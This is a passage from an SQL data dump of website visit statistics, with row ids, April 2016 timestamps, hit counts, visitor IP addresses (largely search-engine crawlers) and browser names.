,0,'66.249.75.81','other'),(35549,1460534670,1,0,1,0,'66.249.69.239',''),(35550,1460534985,1,1,0,0,'66.249.75.81','other'),(35551,1460535287,1,1,0,0,'66.249.75.88','other'),(35552,1460535745,1,1,0,0,'66.249.75.95','other'),(35553,1460536122,1,1,0,0,'91.196.178.65','chrome'),(35554,1460537180,1,1,0,0,'66.249.75.81','other'),(35555,1460538287,1,1,0,0,'91.196.178.70','firefox'),(35556,1460538521,1,1,0,0,'94.179.3.227','chrome'),(35557,1460538530,1,1,0,0,'66.249.75.95','other'),(35558,1460538584,1,1,0,0,'91.196.178.162','chrome'),(35559,1460542025,1,1,0,0,'66.249.75.95','other'),(35560,1460542286,1,1,0,0,'66.249.75.81','other'),(35561,1460542630,1,1,0,0,'66.249.75.88','other'),(35562,1460543274,1,1,0,0,'31.43.24.137','firefox'),(35563,1460543783,2,2,0,0,'66.249.75.81','other'),(35564,1460543933,1,1,0,0,'66.249.75.88','other'),(35565,1460546649,1,0,1,0,'66.249.75.88',''),(35566,1460547061,1,1,0,0,'66.249.75.88','other'),(35567,1460548874,2,2,0,0,'178.216.190.132','firefox'),(35568,1460549635,1,1,0,0,'66.249.75.95','other'),(35569,1460551378,1,0,1,0,'66.249.75.88',''),(35570,1460551394,1,1,0,0,'40.77.167.35','other'),(35571,1460551546,1,1,0,0,'66.249.69.244','other'),(35572,1460551909,1,0,1,0,'66.249.75.95',''),(35573,1460552397,2,2,0,0,'66.249.75.81','other'),(35574,1460552447,1,1,0,0,'66.249.69.249','other'),(35575,1460553265,1,1,0,0,'194.150.168.95','firefox'),(35576,1460553359,1,1,0,0,'91.196.178.101','firefox'),(35577,1460553464,1,1,0,0,'91.196.178.71','firefox'),(35578,1460554082,2,2,0,0,'66.249.75.81','other'),(35579,1460555375,3,3,0,0,'66.249.75.88','other'),(35580,1460555384,1,1,0,0,'66.249.93.150','chrome'),(35581,1460555413,1,1,0,0,'66.249.69.239','other'),(35582,1460555418,1,1,0,0,'91.196.178.40','firefox'),(35583,1460555471,2,2,0,0,'66.249.75.95','other'),(35584,1460555526,2,2,0,0,'66.249.75.81','other'),(35585,1460555786,1,1,0,0,'91.196.178.99','firefox'),(35586,1460556403,2,2,0,0,'66.249.69.249','other'),(35587,1460556753,2,2,0,0,'66.249.69.244','other'),(35588,1460556853,4,4,0,0,'66.249.69.239','other'),(35589,1460556870,1,1,0,0,'94.179.55.154','firefox'),(35590,1460556899,1,1,0,0,'91.196.178.65','chrome'),(35591,1460557509,4,4,0,0,'66.249.75.95','other'),(35592,1460557606,2,2,0,0,'66.249.75.81','other'),(35593,1460557674,2,0,2,0,'66.249.69.244',''),(35594,1460557949,4,4,0,0,'66.249.69.239','other'),(35595,1460558095,3,3,0,0,'66.249.75.88','other'),(35596,1460558155,2,2,0,0,'66.249.69.244','other'),(35597,1460558444,4,4,0,0,'66.249.69.249','other'),(35598,1460558763,1,1,0,0,'94.179.94.176','chrome'),(35599,1460558857,1,1,0,0,'66.249.75.95','other'),(35600,1460559057,1,1,0,0,'66.249.69.244','other'),(35601,1460559146,1,1,0,0,'66.249.75.88','other'),(35602,1460560036,1,1,0,0,'66.249.69.239','other'),(35603,1460562501,2,2,0,0,'94.179.247.188','firefox'),(35604,1460563551,1,0,1,0,'66.249.69.249',''),(35605,1460564736,1,1,0,0,'109.163.234.9','firefox'),(35606,1460567879,1,1,0,0,'94.179.247.188','firefox'),(35607,1460569859,2,0,2,0,'66.249.69.244',''),(35608,1460571708,1,1,0,0,'104.209.188.207','other'),(35609,1460574007,1,1,0,0,'66.249.69.244','other'),(35610,1460576240,1,1,0,0,'66.249.75.95','other'),(35611,1460576649,1,1,0,0,'66.249.69.249','other'),(35612,1460576871,1,1,0,0,'180.76.15.152','other'),(35613,1460577203,1,0,1,0,'66.249.69.244',''),(35614,1460577294,1,0,1,0,'66.249.75.81',''),(35615,1460578701,2,2,0,0,'66.249.75.88','other'),(35616,1460579750,1,1,0,0,'66.249.75.88','other'),(35617,1460580332,1,1,0,0,'5.58.47.233','msie'),(35618,1460583034,1,1,0,0,'66.249.75.95','other'),(35619,1460583801,1,1,0,0,'66.249.75.88','other'),(35620,1460583998,1,1,0,0,'66.249.75.95','chrome'),(35621,1460584420,1,0,1,0,'66.249.69.244',''),(35622,1460585207,1,1,0,0,'66.249.75.95','other'),(35623,1460586798,2,2,0,0,'66.249.69.239','other'),(35624,1460587171,1,1,0,0,'66.249.69.249','other'),(35625,1460588116,1,1,0,0,'66.249.69.239','other'),(35626,1460588169,2,2,0,0,'66.249.69.244','other'),(35627,1460588489,3,3,0,0,'66.249.69.249','other'),(35628,1460588738,3,3,0,0,'66.249.75.88','other'),(35629,1460589541,5,5,0,0,'66.249.75.81','other'),(35630,1460589718,2,2,0,0,'66.249.75.88','other'),(35631,1460590734,1,1,0,0,'66.249.69.249','other'),(35632,1460590912,3,3,0,0,'66.249.75.95','other'),(35633,1460591032,1,0,1,0,'66.249.69.244',''),(35634,1460591160,3,3,0,0,'66.249.75.88','other'),(35635,1460591443,3,3,0,0,'66.249.75.81','other'),(35636,1460591888,1,1,0,0,'66.249.69.244','other'),(35637,1460591956,1,1,0,0,'66.249.69.239','other'),(35638,1460592571,2,2,0,0,'66.249.75.88','other'),(35639,1460592648,1,1,0,0,'66.249.75.95','other'),(35640,1460592718,3,3,0,0,'66.249.69.249','other'),(35641,1460592812,1,1,0,0,'66.249.75.81','other'),(35642,1460593122,3,2,1,0,'66.249.69.244',''),(35643,1460593423,3,3,0,0,'66.249.69.244','other'),(35644,1460593761,6,6,0,0,'66.249.75.88','other'),(35645,1460593900,1,1,0,0,'66.249.69.239','other'),(35646,1460594258,3,3,0,0,'66.249.75.95','other'),(35647,1460595031,1,1,0,0,'66.249.75.88','other'),(35648,1460596332,1,1,0,0,'66.249.75.81','other'),(35649,1460598323,1,1,0,0,'66.249.75.81','other'),(35650,1460598779,1,0,1,0,'66.249.69.239',''),(35651,1460605852,1,1,0,0,'141.8.132.105','other'),(35652,1460607655,1,0,1,0,'66.249.69.249',''),(35653,1460609686,1,1,0,0,'94.179.13.236','chrome'),(35654,1460611141,1,1,0,0,'66.249.93.150','chrome'),(35655,1460611684,1,1,0,0,'91.196.178.65','firefox'),(35656,1460612539,2,0,2,0,'66.249.75.88',''),(35657,1460612600,1,1,0,0,'94.242.221.70','other'),(35658,1460612647,3,3,0,0,'117.245.81.93','other'),(35659,1460612735,1,1,0,0,'94.179.26.115','firefox'),(35660,1460613259,1,0,1,0,'66.249.69.249',''),(35661,1460613293,1,0,1,0,'66.249.75.81',''),(35662,1460615387,1,0,1,0,'66.249.69.239',''),(35663,1460616059,2,2,0,0,'91.196.178.65','firefox'),(35664,1460616721,1,1,0,0,'85.115.58.180','other'),(35665,1460617316,1,1,0,0,'66.249.75.81','other'),(35666,1460617797,1,0,1,0,'66.249.69.239',''),(35667,1460618000,1,1,0,0,'91.196.178.72','firefox'),(35668,1460618082,1,1,0,0,'66.249.75.95','other'),(35669,1460618691,1,1,0,0,'66.249.75.88','other'),(35670,1460619538,1,1,0,0,'40.77.167.35','other'),(35671,1460619736,2,2,0,0,'66.249.75.88','other'),(35672,1460620045,1,1,0,0,'91.196.178.65','firefox'),(35673,1460620765,1,1,0,0,'66.249.75.95','other'),(35674,1460620961,1,1,0,0,'91.196.178.65','firefox'),(35675,1460622121,1,1,0,0,'66.249.75.81','other'),(35676,1460622681,1,1,0,0,'66.249.75.88','other'),(35677,1460622726,3,3,0,0,'91.196.178.65','firefox'),(35678,1460622944,1,1,0,0,'130.180.208.91','other'),(35679,1460623485,1,1,0,0,'91.196.177.26','chrome'),(35680,1460623794,1,1,0,0,'91.196.178.65','firefox'),(35681,1460625003,1,1,0,0,'37.52.23.53','chrome'),(35682,1460625364,1,1,0,0,'66.249.75.88','other'),(35683,1460626082,1,1,0,0,'66.249.75.81','chrome'),(35684,1460626112,1,1,0,0,'66.249.75.81','other'),(35685,1460627859,1,0,1,0,'66.249.69.244',''),(35686,1460628614,1,1,0,0,'37.52.23.53','chrome'),(35687,1460628664,1,1,0,0,'178.95.81.185','opera'),(35688,1460631703,1,1,0,0,'66.249.75.81','other'),(35689,1460631976,1,0,1,0,'66.249.69.249',''),(35690,1460633857,1,1,0,0,'91.196.178.65','firefox'),(35691,1460634229,2,1,1,0,'66.249.75.88',''),(35692,1460634341,1,1,0,0,'66.249.69.239','other'),(35693,1460634694,1,1,0,0,'66.249.69.249','other'),(35694,1460635659,1,1,0,0,'93.76.218.23','other'),(35695,1460636095,1,1,0,0,'91.196.178.68','firefox'),(35696,1460636407,1,0,1,0,'66.249.69.244',''),(35697,1460636408,1,1,0,0,'94.179.44.249','firefox'),(35698,1460636603,1,1,0,0,'66.249.69.249','other'),(35699,1460636863,1,1,0,0,'91.196.178.99','chrome'),(35700,1460637314,1,1,0,0,'94.179.44.249','firefox'),(35701,1460637521,1,0,1,0,'66.249.75.88',''),(35702,1460638284,1,0,1,0,'66.249.75.81',''),(35703,1460638376,1,1,0,0,'66.249.69.244','other'),(35704,1460638921,1,1,0,0,'94.179.44.249','firefox'),(35705,1460639190,1,1,0,0,'91.196.178.65','firefox'),(35706,1460639584,1,0,1,0,'66.249.75.88',''),(35707,1460639981,1,0,1,0,'66.249.69.239',''),(35708,1460640343,1,1,0,0,'66.102.9.113','chrome'),(35709,1460641094,1,1,0,0,'66.249.75.88','other'),(35710,1460641153,1,1,0,0,'178.95.244.6','firefox'),(35711,1460641553,1,1,0,0,'91.196.178.68','chrome'),(35712,1460642479,1,1,0,0,'37.53.90.175','firefox'),(35713,1460642784,1,1,0,0,'91.196.178.67','firefox'),(35714,1460643894,3,0,3,0,'66.249.75.81',''),(35715,1460646329,1,1,0,0,'66.249.69.244','other'),(35716,1460649247,1,0,1,0,'66.249.69.239',''),(35717,1460649381,1,0,1,0,'66.249.75.95',''),(35718,1460651451,1,1,0,0,'94.179.247.188','firefox'),(35719,1460652525,1,1,0,0,'66.249.75.81','chrome'),(35720,1460652693,1,0,1,0,'66.249.69.244',''),(35721,1460653008,1,0,1,0,'66.249.69.239',''),(35722,1460653925,1,0,1,0,'66.249.69.249',''),(35723,1460653992,3,0,3,0,'66.249.69.239',''),(35724,1460654057,1,0,1,0,'66.249.75.95',''),(35725,1460654597,1,1,0,0,'82.145.218.130','other'),(35726,1460654702,1,0,1,0,'66.249.69.244',''),(35727,1460655272,1,1,0,0,'94.179.247.188','firefox'),(35728,1460655427,3,0,3,0,'66.249.69.239',''),(35729,1460656484,1,1,0,0,'66.249.75.95','other'),(35730,1460657298,2,0,2,0,'66.249.69.239',''),(35731,1460658214,1,1,0,0,'66.249.75.88','other'),(35732,1460658911,2,0,2,0,'66.249.69.239',''),(35733,1460659115,1,1,0,0,'5.58.5.245','msie'),(35734,1460659609,1,0,1,0,'66.249.69.249',''),(35735,1460660011,2,0,2,0,'66.249.69.244',''),(35736,1460660445,2,0,2,0,'66.249.69.239',''),(35737,1460660788,1,1,0,0,'204.79.180.249','msie'),(35738,1460660960,1,0,1,0,'66.249.69.244',''),(35739,1460661443,1,1,0,0,'66.249.75.81','other'),(35740,1460661784,1,1,0,0,'66.249.75.88','other'),(35741,1460662230,1,0,1,0,'66.249.69.249',''),(35742,1460662309,1,0,1,0,'66.249.69.239',''),(35743,1460662653,1,0,1,0,'66.249.69.244',''),(35744,1460663976,1,1,0,0,'66.249.69.249','other'),(35745,1460665208,1,0,1,0,'66.249.75.88',''),(35746,1460666552,1,1,0,0,'195.245.118.14','chrome'),(35747,1460667409,1,1,0,0,'66.249.75.88','other'),(35748,1460668803,1,0,1,0,'66.249.69.239',''),(35749,1460669481,1,0,1,0,'66.249.69.249',''),(35750,1460669592,2,2,0,0,'66.249.75.81','other'),(35751,1460669848,2,2,0,0,'66.249.75.88','other'),(35752,1460671187,3,2,1,0,'66.249.75.88',''),(35753,1460671502,2,2,0,0,'66.249.69.249','other'),(35754,1460671841,1,1,0,0,'66.249.75.95','other'),(35755,1460672202,2,2,0,0,'66.249.75.81','other'),(35756,1460672281,3,3,0,0,'66.249.75.88','other'),(35757,1460673186,2,2,0,0,'66.249.75.81','other'),(35758,1460673651,2,2,0,0,'66.249.75.88','other'),(35759,1460673806,1,1,0,0,'66.249.69.249','other'),(35760,1460673892,1,1,0,0,'66.249.75.95','other'),(35761,1460674614,1,1,0,0,'66.249.75.88','other'),(35762,1460675199,1,0,1,0,'66.249.69.239',''),(35763,1460675310,2,0,2,0,'66.249.69.249',''),(35764,1460676132,1,0,1,0,'66.249.69.244',''),(35765,1460676283,1,0,1,0,'66.249.69.249',''),(35766,1460676438,1,1,0,0,'207.46.13.180','other'),(35767,1460676851,1,0,1,0,'66.249.75.95',''),(35768,1460677055,2,1,1,0,'66.249.69.244',''),(35769,1460677640,1,1,0,0,'66.249.69.244','other'),(35770,1460679015,3,0,3,0,'66.249.69.249',''),(35771,1460679499,1,1,0,0,'130.185.155.10','msie'),(35772,1460680073,1,0,1,0,'66.249.69.244',''),(35773,1460680116,1,0,1,0,'66.249.75.95',''),(35774,1460681680,1,1,0,0,'207.46.13.12','other'),(35775,1460686705,1,1,0,0,'130.193.50.34','other'),(35776,1460686752,1,1,0,0,'66.249.75.95','other'),(35777,1460689120,1,1,0,0,'94.179.247.188','other'),(35778,1460689317,1,0,1,0,'66.249.69.239',''),(35779,1460690032,1,1,0,0,'94.179.247.188','firefox'),(35780,1460690199,1,0,1,0,'66.249.69.244',''),(35781,1460691284,1,1,0,0,'94.179.247.188','firefox'),(35782,1460692175,1,0,1,0,'66.249.69.244',''),(35783,1460697705,1,1,0,0,'91.196.178.70','firefox'),(35784,1460698791,2,0,2,0,'66.249.69.244',''),(35785,1460699719,2,0,2,0,'66.249.69.249',''),(35786,1460701036,1,1,0,0,'66.249.93.153','chrome'),(35787,1460701496,1,0,1,0,'66.249.69.244',''),(35788,1460702010,1,0,1,0,'66.249.69.239',''),(35789,1460703170,2,0,2,0,'66.249.69.239',''),(35790,1460703747,2,0,2,0,'66.249.69.249',''),(35791,1460704582,1,1,0,0,'91.196.178.68','chrome'),(35792,1460705635,1,1,0,0,'66.249.75.81','other'),(35793,1460707024,1,1,0,0,'66.249.75.95','other'),(35794,1460707234,1,1,0,0,'130.193.50.34','other'),(35795,1460707605,1,1,0,0,'66.249.75.81','other'),(35796,1460709768,3,2,1,0,'66.249.75.88',''),(35797,1460710362,1,1,0,0,'66.249.69.239','other'),(35798,1460712115,1,1,0,0,'91.196.178.70','firefox'),(35799,1460714596,1,1,0,0,'91.196.178.70','firefox'),(35800,1460715180,1,1,0,0,'66.249.75.88','other'),(35801,1460715374,1,1,0,0,'66.249.69.249','other'),(35802,1460716081,1,1,0,0,'66.249.69.239','other'),(35803,1460717559,2,1,1,0,'66.249.69.249',''),(35804,1460718658,1,0,1,0,'66.249.69.239',''),(35805,1460718792,1,0,1,0,'66.249.69.244',''),(35806,1460718898,1,1,0,0,'91.196.178.71','firefox'),(35807,1460718983,2,2,0,0,'91.196.178.68','firefox'),(35808,1460720495,1,1,0,0,'178.255.215.94','other'),(35809,1460725292,1,0,1,0,'66.249.75.95',''),(35810,1460725854,1,0,1,0,'66.249.69.249',''),(35811,1460728164,1,1,0,0,'91.196.178.69','other'),(35812,1460731185,2,0,2,0,'66.249.69.244',''),(35813,1460731436,1,0,1,0,'66.249.69.239',''),(35814,1460731897,2,0,2,0,'66.249.69.249',''),(35815,1460732233,4,0,4,0,'66.249.69.244',''),(35816,1460732475,1,0,1,0,'66.249.75.81',''),(35817,1460732627,2,0,2,0,'66.249.69.239',''),(35818,1460734343,5,0,5,0,'66.249.69.239',''),(35819,1460735044,1,1,0,0,'91.124.181.69','firefox'),(35820,1460735824,1,1,0,0,'91.196.178.71','firefox'),(35821,1460735879,1,0,1,0,'66.249.69.239',''),(35822,1460737025,2,0,2,0,'66.249.69.244',''),(35823,1460737040,1,0,1,0,'66.249.69.239',''),(35824,1460737506,1,0,1,0,'66.249.69.249',''),(35825,1460738122,1,0,1,0,'66.249.69.239',''),(35826,1460738602,2,0,2,0,'66.249.69.244',''),(35827,1460738798,1,0,1,0,'66.249.69.249',''),(35828,1460739516,1,0,1,0,'66.249.69.239',''),(35829,1460740062,1,0,1,0,'66.249.69.249',''),(35830,1460741836,1,0,1,0,'66.249.69.244',''),(35831,1460745442,2,1,1,0,'66.249.75.95',''),(35832,1460745846,1,1,0,0,'66.249.69.249','other'),(35833,1460746046,1,1,0,0,'66.249.75.81','other'),(35834,1460746670,1,0,1,0,'66.249.75.88',''),(35835,1460747861,1,1,0,0,'66.249.75.95','other'),(35836,1460747974,2,2,0,0,'66.249.69.239','other'),(35837,1460748669,1,1,0,0,'94.179.76.1','chrome'),(35838,1460748689,1,1,0,0,'213.174.21.150','chrome'),(35839,1460748849,2,1,1,0,'66.249.69.249',''),(35840,1460751268,2,2,0,0,'66.249.69.244','other'),(35841,1460755032,2,0,2,0,'66.249.69.239',''),(35842,1460755601,1,1,0,0,'66.249.75.88','other'),(35843,1460755611,1,1,0,0,'37.229.103.109','opera'),(35844,1460756224,4,0,4,0,'66.249.69.239',''),(35845,1460756366,1,0,1,0,'66.249.69.249',''),(35846,1460756738,2,0,2,0,'66.249.69.244',''),(35847,1460757299,1,1,0,0,'66.249.75.95','other'),(35848,1460757546,1,0,1,0,'66.249.69.239',''),(35849,1460758043,1,1,0,0,'66.249.75.81','other'),(35850,1460758579,2,0,2,0,'66.249.69.244',''),(35851,1460759105,2,0,2,0,'66.249.69.249',''),(35852,1460760256,3,1,2,0,'66.249.69.249',''),(35853,1460760369,1,1,0,0,'66.249.75.81','other'),(35854,1460760979,1,1,0,0,'66.249.75.88','other'),(35855,1460761170,1,0,1,0,'66.249.69.239',''),(35856,1460761558,2,1,1,0,'66.249.69.239',''),(35857,1460761879,3,0,3,0,'66.249.69.244',''),(35858,1460763155,1,0,1,0,'66.249.69.249',''),(35859,1460763882,1,1,0,0,'66.249.75.88','other'),(35860,1460764086,2,0,2,0,'66.249.69.249',''),(35861,1460764116,2,2,0,0,'66.249.75.95','other'),(35862,1460765523,1,1,0,0,'66.249.75.81','other'),(35863,1460766920,1,1,0,0,'66.249.69.239','chrome'),(35864,1460768524,2,1,1,0,'66.249.69.249',''),(35865,1460769810,1,1,0,0,'66.249.75.81','other'),(35866,1460769865,1,1,0,0,'66.249.75.88','other'),(35867,1460770962,1,1,0,0,'204.79.180.158','msie'),(35868,1460772081,1,0,1,0,'66.249.75.95',''),(35869,1460773900,1,1,0,0,'66.249.69.239','other'),(35870,1460776874,6,0,6,0,'66.249.69.239',''),(35871,1460777990,1,0,1,0,'66.249.69.244',''),(35872,1460778471,2,0,2,0,'66.249.69.249',''),(35873,1460780073,1,0,1,0,'66.249.69.239',''),(35874,1460780537,1,0,1,0,'66.249.75.81',''),(35875,1460782697,1,1,0,0,'46.161.9.6','other'),(35876,1460785259,1,0,1,0,'66.249.69.249',''),(35877,1460785405,1,0,1,0,'66.249.69.239',''),(35878,1460785981,1,0,1,0,'66.249.75.81',''),(35879,1460789522,1,1,0,0,'66.249.93.153','chrome'),(35880,1460789607,1,0,1,0,'66.249.75.95',''),(35881,1460790236,1,1,0,0,'66.249.75.88','other'),(35882,1460794489,1,1,0,0,'66.249.75.95','other'),(35883,1460794875,1,0,1,0,'66.249.75.88',''),(35884,1460794952,1,0,1,0,'66.249.69.249',''),(35885,1460795064,1,1,0,0,'66.249.75.88','other'),(35886,1460796019,2,2,0,0,'66.249.75.81','other'),(35887,1460796282,2,2,0,0,'66.249.69.249','other'),(35888,1460796618,5,5,0,0,'66.249.69.244','other'),(35889,1460796857,3,3,0,0,'66.249.69.239','other'),(35890,1460797224,1,1,0,0,'66.249.75.81','other'),(35891,1460797590,1,1,0,0,'66.249.69.244','other'),(35892,1460798267,1,1,0,0,'66.249.75.81','other'),(35893,1460798769,1,1,0,0,'66.249.69.239','other'),(35894,1460798979,3,3,0,0,'66.249.69.244','other'),(35895,1460799697,1,1,0,0,'66.249.75.95','other'),(35896,1460799908,1,0,1,0,'66.249.69.244',''),(35897,1460800313,1,1,0,0,'66.249.69.239','other'),(35898,1460803375,1,0,1,0,'66.249.75.81',''),(35899,1460804948,1,0,1,0,'66.249.75.95',''),(35900,1460808495,1,0,1,0,'66.249.69.239',''),(35901,1460810527,2,0,2,0,'66.249.69.239',''),(35902,1460810591,1,0,1,0,'66.249.69.249',''),(35903,1460811952,2,0,2,0,'66.249.69.239',''),(35904,1460813759,1,0,1,0,'66.249.69.249',''),(35905,1460813967,1,1,0,0,'193.194.127.217','firefox'),(35906,1460814222,1,1,0,0,'66.249.69.244','other'),(35907,1460815239,2,0,2,0,'66.249.69.239',''),(35908,1460816409,1,0,1,0,'66.249.69.244',''),(35909,1460816546,1,1,0,0,'91.196.178.33','firefox'),(35910,1460816602,2,0,2,0,'66.249.69.249',''),(35911,1460817055,3,1,2,0,'66.249.69.244',''),(35912,1460817290,2,2,0,0,'130.193.50.34','other'),(35913,1460817298,1,1,0,0,'141.8.132.105','other'),(35914,1460817303,1,1,0,0,'130.193.51.19','other'),(35915,1460817306,1,1,0,0,'5.255.253.113','other'),(35916,1460817310,1,1,0,0,'130.193.51.83','other'),(35917,1460817388,1,0,1,0,'66.249.75.81',''),(35918,1460817702,1,0,1,0,'66.249.69.239',''),(35919,1460818853,2,2,0,0,'37.55.224.7','firefox'),(35920,1460818891,1,1,0,0,'37.55.224.7','chrome'),(35921,1460818929,1,0,1,0,'66.249.69.239',''),(35922,1460819050,2,0,2,0,'66.249.69.244',''),(35923,1460819095,1,1,0,0,'91.196.177.69','chrome'),(35924,1460819434,2,0,2,0,'66.249.69.249',''),(35925,1460820269,2,0,2,0,'66.249.69.244',''),(35926,1460820579,1,0,1,0,'66.249.69.239',''),(35927,1460820744,1,1,0,0,'130.185.155.10','msie'),(35928,1460822283,1,1,0,0,'66.249.69.249','chrome'),(35929,1460823071,1,1,0,0,'141.8.132.41','other'),(35930,1460823676,1,1,0,0,'91.124.181.69','firefox'),(35931,1460825528,1,1,0,0,'66.249.75.81','other'),(35932,1460825539,1,1,0,0,'66.249.75.88','other'),(35933,1460828532,4,4,0,0,'66.249.69.249','other'),(35934,1460828823,1,1,0,0,'66.249.75.81','other'),(35935,1460829019,3,3,0,0,'66.249.69.244','other'),(35936,1460829135,9,9,0,0,'66.249.69.239','other'),(35937,1460829484,1,1,0,0,'66.249.75.95','other'),(35938,1460829545,6,6,0,0,'66.249.69.249','other'),(35939,1460830098,2,2,0,0,'66.249.69.239','other'),(35940,1460830488,2,2,0,0,'66.249.69.244','other'),(35941,1460830761,1,1,0,0,'5.58.92.88','other'),(35942,1460831480,1,1,0,0,'66.249.69.239','other'),(35943,1460831623,1,1,0,0,'5.58.92.88','opera'),(35944,1460832507,1,1,0,0,'157.55.39.152','other'),(35945,1460833972,1,0,1,0,'66.249.75.95',''),(35946,1460835183,1,1,0,0,'194.44.124.94','opera'),(35947,1460836481,1,0,1,0,'66.249.75.81',''),(35948,1460837419,1,1,0,0,'66.249.75.88','other'),(35949,1460838829,1,1,0,0,'141.8.183.25','other'),(35950,1460842835,61,61,0,0,'185.4.73.108','other'),(35951,1460842997,2,2,0,0,'157.55.39.152','other'),(35952,1460843006,2,0,2,0,'66.249.69.249',''),(35953,1460843441,2,0,2,0,'66.249.69.244',''),(35954,1460844446,2,0,2,0,'66.249.69.244',''),(35955,1460844871,1,0,1,0,'66.249.69.249',''),(35956,1460846164,1,0,1,0,'66.249.75.95',''),(35957,1460846549,2,0,2,0,'66.249.69.239',''),(35958,1460847555,2,0,2,0,'66.249.69.239',''),(35959,1460850301,4,0,4,0,'66.249.69.244',''),(35960,1460850729,1,0,1,0,'66.249.75.95',''),(35961,1460852690,16,16,0,0,'130.193.50.34','other'),(35962,1460852694,8,8,0,0,'141.8.132.105','other'),(35963,1460852716,6,6,0,0,'5.255.253.113','other'),(35964,1460852723,1,1,0,0,'130.193.51.19','other'),(35965,1460852780,1,1,0,0,'130.193.51.83','other'),(35966,1460852786,2,2,0,0,'141.8.183.25','other'),(35967,1460853350,1,1,0,0,'204.79.180.2','msie'),(35968,1460857947,1,1,0,0,'66.249.75.81','other'),(35969,1460859145,1,1,0,0,'66.249.75.95','other'),(35970,1460859157,1,1,0,0,'141.8.142.85','other'),(35971,1460859160,1,1,0,0,'130.193.50.6','other'),(35972,1460863798,1,1,0,0,'157.55.39.152','other'),(35973,1460866244,1,1,0,0,'141.0.14.163','other'),(35974,1460874245,1,1,0,0,'66.249.75.81','other'),(35975,1460874669,1,1,0,0,'66.249.93.150','chrome'),(35976,1460875237,1,1,0,0,'66.249.69.239','other'),(35977,1460875477,1,1,0,0,'178.154.189.202','other'),(35978,1460875626,1,1,0,0,'204.79.180.53','msie'),(35979,1460875758,1,1,0,0,'5.58.92.88','opera'),(35980,1460875907,1,1,0,0,'91.124.181.69','firefox'),(35981,1460877794,1,1,0,0,'94.179.10.54','chrome'),(35982,1460879279,1,1,0,0,'91.124.181.69','firefox'),(35983,1460879792,1,1,0,0,'66.249.75.81','other'),(35984,1460880367,1,1,0,0,'91.196.178.33','firefox'),(35985,1460882411,1,1,0,0,'66.249.69.239','other'),(35986,1460883051,1,1,0,0,'66.249.69.239','chrome'),(35987,1460885842,1,1,0,0,'66.249.69.249','other'),(35988,1460886911,1,1,0,0,'66.249.69.244','other'),(35989,1460887465,1,1,0,0,'66.249.69.249','other'),(35990,1460888884,1,1,0,0,'66.249.75.95','other'),(35991,1460889278,1,0,1,0,'66.249.69.244',''),(35992,1460889829,2,2,0,0,'66.249.69.249','other'),(35993,1460889995,2,2,0,0,'66.249.69.239','other'),(35994,1460892537,1,1,0,0,'66.249.69.239','other'),(35995,1460893154,1,1,0,0,'66.249.69.244','other'),(35996,1460897602,1,1,0,0,'204.79.180.6','msie'),(35997,1460900699,1,1,0,0,'66.249.69.239','other'),(35998,1460902121,1,1,0,0,'130.193.50.34','other'),(35999,1460902387,1,1,0,0,'37.115.131.210','chrome'),(36000,1460906510,1,1,0,0,'93.158.152.46','other'),(36001,1460907588,1,1,0,0,'91.124.181.69','firefox'),(36002,1460908285,1,1,0,0,'180.76.15.144','other'),(36003,1460910865,1,1,0,0,'178.154.189.202','other'),(36004,1460910870,1,1,0,0,'178.154.189.203','other'),(36005,1460915343,1,1,0,0,'141.8.184.107','chrome'),(36006,1460915998,1,1,0,0,'66.249.69.239','chrome'),(36007,1460916513,1,1,0,0,'91.124.181.69','firefox'),(36008,1460916615,2,2,0,0,'141.8.184.107','other'),(36009,1460917580,2,2,0,0,'91.124.181.69','firefox'),(36010,1460917635,1,0,1,0,'66.249.69.249',''),(36011,1460918412,1,1,0,0,'212.90.63.47','chrome'),(36012,1460919365,1,1,0,0,'66.249.75.81','other'),(36013,1460919532,1,1,0,0,'66.249.69.239','other'),(36014,1460920667,1,1,0,0,'66.249.69.249','chrome'),(36015,1460921235,1,1,0,0,'66.249.69.239','other'),(36016,1460921677,2,2,0,0,'66.249.69.244','other'),(36017,1460923739,1,1,0,0,'66.249.69.244','other'),(36018,1460924572,2,2,0,0,'66.249.69.249','other'),(36019,1460924747,1,1,0,0,'66.249.69.239','other'),(36020,1460925170,4,4,0,0,'66.249.69.244','other'),(36021,1460925310,3,3,0,0,'188.187.188.153','other'),(36022,1460925723,3,3,0,0,'66.249.69.249','other'),(36023,1460926366,1,1,0,0,'207.46.13.26','other'),(36024,1460926415,2,2,0,0,'66.249.69.239','other'),(36025,1460926424,2,2,0,0,'40.77.167.51','other'),(36026,1460926433,1,1,0,0,'157.55.39.146','other'),(36027,1460926452,3,3,0,0,'157.55.39.236','other'),(36028,1460926630,1,1,0,0,'66.249.69.249','other'),(36029,1460927463,3,3,0,0,'66.249.69.239','other'),(36030,1460927889,2,2,0,0,'66.249.69.244','other'),(36031,1460928048,1,1,0,0,'66.249.69.249','other'),(36032,1460928537,1,1,0,0,'66.249.75.95','other'),(36033,1460929002,3,3,0,0,'66.249.69.249','other'),(36034,1460929240,2,2,0,0,'66.249.69.244','other'),(36035,1460929563,2,2,0,0,'66.249.69.239','other'),(36036,1460930209,2,2,0,0,'66.249.69.244','other'),(36037,1460931067,1,1,0,0,'66.249.69.239','other'),(36038,1460931948,1,1,0,0,'66.249.69.244','chrome'),(36039,1460932490,1,1,0,0,'66.249.69.239','other'),(36040,1460933281,2,2,0,0,'66.249.75.95','other'),(36041,1460934570,1,0,1,0,'66.249.69.239',''),(36042,1460936072,1,0,1,0,'66.249.75.95',''),(36043,1460939003,1,0,1,0,'66.249.69.239',''),(36044,1460940780,1,0,1,0,'66.249.69.249',''),(36045,1460941738,2,2,0,0,'66.249.69.239','other'),(36046,1460943517,1,1,0,0,'66.249.69.244','other'),(36047,1460943998,1,1,0,0,'66.249.69.239','other'),(36048,1460944834,1,0,1,0,'66.249.69.244',''),(36049,1460951571,1,1,0,0,'130.193.51.83','other'),(36050,1460955545,1,1,0,0,'130.185.155.10','msie'),(36051,1460955947,1,1,0,0,'141.8.132.105','other'),(36052,1460956142,1,1,0,0,'66.249.69.249','chrome'),(36053,1460958684,1,1,0,0,'66.249.93.153','chrome'),(36054,1460960123,1,1,0,0,'91.196.178.68','firefox'),(36055,1460960550,1,1,0,0,'66.249.69.239','other'),(36056,1460961075,1,1,0,0,'180.76.15.13','other'),(36057,1460962151,2,2,0,0,'66.249.69.249','other'),(36058,1460962700,4,4,0,0,'66.249.69.244','other'),(36059,1460963116,2,2,0,0,'66.249.69.249','other'),(36060,1460963211,1,1,0,0,'66.249.69.239','other'),(36061,1460963323,1,1,0,0,'91.196.179.65','chrome'),(36062,1460963884,1,1,0,0,'66.249.75.95','other'),(36063,1460964821,1,0,1,0,'66.249.69.239',''),(36064,1460964872,1,1,